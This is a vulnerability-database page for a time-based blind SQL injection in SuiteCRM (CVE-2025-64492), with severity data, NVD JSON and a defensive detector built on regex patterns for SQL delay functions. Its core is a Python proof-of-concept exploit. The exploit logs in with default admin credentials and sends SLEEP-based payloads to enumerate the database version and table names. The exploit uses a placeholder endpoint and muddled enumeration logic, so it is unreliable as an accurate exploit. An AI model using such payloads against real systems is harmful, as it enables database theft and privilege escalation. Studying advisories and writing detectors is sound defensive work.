Security Vulnerability Report
CVE-2025-64492 CVSS 8.8 HIGH

CVE-2025-64492

Published: 2025-11-08 02:15:35
Last Modified: 2025-11-25 17:33:25

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 8.9.0 and below contain a time-based blind SQL Injection vulnerability. This vulnerability allows an authenticated attacker to infer data from the database by measuring response times, potentially leading to the extraction of sensitive information. It is possible for an attacker to enumerate database, table, and column names, extract sensitive data, or escalate privileges. This is fixed in version 8.9.1.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM-Core < 8.9.1
All SuiteCRM versions 8.9.0 and below

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import time
import requests

# CVE-2025-64492 Time-Based Blind SQL Injection PoC
# Target: SuiteCRM <= 8.9.0
# Author: Security Researcher

TARGET_URL = "http://target-suitecrm.com"
LOGIN_URL = f"{TARGET_URL}/api/oauth/access-token"
TARGET_ENDPOINT = f"{TARGET_URL}/api/v8/some-endpoint"
USERNAME = "admin"
PASSWORD = "admin"


def login():
    """Authenticate and get access token"""
    data = {
        "grant_type": "password",
        "client_id": "suitecrm",
        "client_secret": "",
        "username": USERNAME,
        "password": PASSWORD
    }
    response = requests.post(LOGIN_URL, json=data)
    if response.status_code == 200:
        return response.json().get("access_token")
    return None


def inject_sql_payload(token, payload):
    """Send SQL injection payload and measure response time"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    data = {
        "filter": [
            {
                "field": f"test' AND (SELECT CASE WHEN ({payload}) THEN SLEEP(5) ELSE 0 END) AND '1'='1",
                "operator": "equals",
                "value": "1"
            }
        ]
    }
    start_time = time.time()
    response = requests.post(TARGET_ENDPOINT, json=data, headers=headers, timeout=30)
    elapsed_time = time.time() - start_time
    return elapsed_time


def extract_db_version(token):
    """Extract database version using time-based blind SQLi"""
    payload = "(SELECT SUBSTRING(@@version,1,1)='5')"  # MySQL 5.x
    elapsed = inject_sql_payload(token, payload)
    return elapsed > 5


def extract_table_names(token):
    """Enumerate table names from database"""
    tables = []
    for i in range(1, 50):
        payload = f"(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database() AND SUBSTRING(table_name,{i},1)='a')"
        if inject_sql_payload(token, payload) > 5:
            # Extract character by character
            table_name = ""
            for j in range(1, 50):
                for char in range(32, 127):
                    payload = f"(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database() AND SUBSTRING(table_name,{j},1)=CHAR({char}))"
                    if inject_sql_payload(token, payload) > 5:
                        table_name += chr(char)
                        break
            tables.append(table_name)
            break
    return tables


def main():
    print("[*] CVE-2025-64492 - SuiteCRM Time-Based Blind SQL Injection")
    print("[*] Authenticating to SuiteCRM...")
    token = login()
    if not token:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")
    print("[*] Testing SQL injection...")
    if extract_db_version(token):
        print("[+] Database version extraction successful")
        tables = extract_table_names(token)
        print(f"[+] Found tables: {tables}")


if __name__ == "__main__":
    main()
```
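As an added defensive illustration (not part of the advisory, the PoC, or SuiteCRM's own code): the detector below scans constructed API request records shaped like the PoC's filter body for time-delay primitives, quote break-outs and non-identifier field names, and confirms a hit when the measured latency matches the injected delay. The record layout, the log field names and the 4-second threshold are assumptions.

```python
import re

# Constructed sample records (not real SuiteCRM logs): the JSON body sent to a
# filter endpoint plus the server-side latency measured for that request.
SAMPLE_REQUESTS = [
    {"user": "alice", "path": "/api/v8/module/Accounts", "latency_s": 0.21,
     "body": {"filter": [{"field": "name", "operator": "equals", "value": "Acme"}]}},
    {"user": "bob", "path": "/api/v8/module/Accounts", "latency_s": 5.34,
     "body": {"filter": [{"field": "test' AND (SELECT CASE WHEN ((SELECT SUBSTRING(@@version,1,1)='5'))"
                                   " THEN SLEEP(5) ELSE 0 END) AND '1'='1",
                          "operator": "equals", "value": "1"}]}},
    {"user": "carol", "path": "/api/v8/module/Contacts", "latency_s": 0.05,
     "body": {"filter": [{"field": "last_name", "operator": "equals", "value": "O'Brien"}]}},
]

# Delay primitives a time-based blind SQLi depends on (MySQL, PostgreSQL, MSSQL).
TIME_DELAY_RE = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.IGNORECASE)
# A quote directly followed by a boolean operator suggests a break-out of a string literal.
BREAKOUT_RE = re.compile(r"'\s*(AND|OR)\b", re.IGNORECASE)
# In a legitimate request the filter "field" is a column identifier, nothing else.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*$")


def classify_request(record, slow_threshold_s=4.0):
    """Return the list of indicator names found in one request record."""
    indicators = []
    for clause in record["body"].get("filter", []):
        field = str(clause.get("field", ""))
        value = str(clause.get("value", ""))
        if not IDENT_RE.match(field):
            indicators.append("non_identifier_field")
        # Scan both the field name and the value: the PoC injects via "field",
        # but the same primitives would be just as suspicious in "value".
        for text in (field, value):
            if TIME_DELAY_RE.search(text) and "time_delay_function" not in indicators:
                indicators.append("time_delay_function")
            if BREAKOUT_RE.search(text) and "quote_breakout" not in indicators:
                indicators.append("quote_breakout")
    # A delay primitive that actually produced a slow response is the strongest signal.
    if "time_delay_function" in indicators and record["latency_s"] >= slow_threshold_s:
        indicators.append("delay_confirmed_by_latency")
    return indicators


def find_suspicious(records):
    """Return (user, path, indicators) for every record that raised at least one indicator."""
    hits = []
    for record in records:
        found = classify_request(record)
        if found:
            hits.append((record["user"], record["path"], found))
    return hits
```

The apostrophe in carol's value shows that an ordinary quote in data does not trip the break-out rule; only a quote followed by a boolean operator does.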

References

https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-54m4-4p54-j8hp (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-64492",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-08T02:15:34.693",
    "lastModified": "2025-11-25T17:33:24.510",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 8.9.0 and below contain a time-based blind SQL Injection vulnerability. This vulnerability allows an authenticated attacker to infer data from the database by measuring response times, potentially leading to the extraction of sensitive information. It is possible for an attacker to enumerate database, table, and column names, extract sensitive data, or escalate privileges. This is fixed in version 8.9.1."
      },
      {
        "lang": "es",
        "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. Las versiones 8.9.0 e inferiores contienen una vulnerabilidad de inyección SQL ciega basada en tiempo. Esta vulnerabilidad permite a un atacante autenticado inferir datos de la base de datos midiendo los tiempos de respuesta, lo que podría llevar a la extracción de información sensible. Es posible para un atacante enumerar nombres de bases de datos, tablas y columnas, extraer datos sensibles o escalar privilegios. Esto está corregido en la versión 8.9.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-89"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.0.0",
                "versionEndExcluding": "8.9.1",
                "matchCriteriaId": "5DFDEB5D-4821-41F8-AEBB-38D394739DDE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-54m4-4p54-j8hp",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```